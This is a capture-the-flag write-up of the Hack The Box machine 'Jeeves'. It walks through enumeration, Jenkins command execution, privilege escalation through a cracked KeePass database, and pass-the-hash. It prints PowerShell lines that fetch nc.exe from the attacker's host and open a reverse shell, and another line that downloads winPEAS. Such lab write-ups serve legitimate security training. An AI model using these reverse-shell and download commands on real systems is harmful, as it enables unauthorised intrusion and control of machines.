Jeeves Retired Box from Hackthebox

In this documentation and write-up I’ll be penetrating Hackthebox retired box “Jeeves” which is a medium box on Hackthebox. without more talking lets cut to the chase, and get lost in the astonishing loophole of the matrix.

While we are in any penetration testing engagement we start by information gathering , there are many tools at our disposal when it comes to information gathering.

lets start by pinging the target, ping command is used to send ICMP Requests to the target to check if its up :

• ping 10.10.10.63 :

ping test for availability.

next we scan the target with nmap :

Initial Nmap Scan

we notice from the scan that the following ports are open :

80 — HTTP

22 — SSH

445 — SMB

next what I’d like to do in this engagement is running smb version auxiliary scanner using metasploit to check

which version is the SMB in this target.

SMB Version Check.

From the SMB version and after some researching I found that this version is vulnerable to SMB Ghost CVE_2020_0796_smbghost

as Shown in the screenshot below I’ve tried to exploit it but its not a viable approach.

Checking SMBGhost Vulnerability

lets move on >>>

Through Enumeration and after enumerating the web directory I found a web directory called askjeeves on port 50000.

lets head to it now:

Enumeration findings through ffuf tool.

next using this command for execution : powershell wget “http://10.10.14.3:8000/nc.exe" -outfile “nc.exe” nc.exe -e cmd 10.10.14.3 9001

on the Build Section on Jenkins and while that is being built I’m listing on port 9001:

Listening for incoming connection on port 9001.

also hosting nc.exe on my python HTTP server so I can grab it from my box to Jenkins box:

Setting up Python Web server.

and there we go we got our initial foothold:

Initial Foothold.

next for privilege escalation I’m going to use winpeas, first we need to transfer the file from our box to the target machine, again hosting python web-server and transferring the file using powershell >

powershell -c (New-Object Net.WebClient).DownloadFile(‘http://10.10.14.3:8000/winPEASx64.exe', ‘c:\windows\temp\winpeas.exe’)

while that is being ran I was looking around the directories where I found something really interesting :

Keepass password database 2.x KDBX

So I thought of an idea of cracking it with john, so lets get to it :

John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems. John the Ripper jumbo supports hundreds of hash and cipher types, including for: user passwords of Unix flavors

after cracking the password and launching the database file I found a couple more interesting info inside the database.

I found a hash that is for the admin user, from there I thought we can use Pass-the-Hash technique so lets go ahead and use it!

Identifying the Keepass database file.

and here is the steps I took to do that :

powershell wget “http://10.10.14.28:8000/nc.exe" -outfile “nc.exe” nc.exe -e cmd 10.10.14.28 9001

After getting the initial foothold I’ve got admin through Pass the hash technique with impacket tool psexec.

after that getting root or admin in this case is by typing this command :

powershell Get-Content -Path “hm.txt” -Stream “root.txt”

Found an interesting file called hm.txt

Thanks for reading, and stay tuned for the next!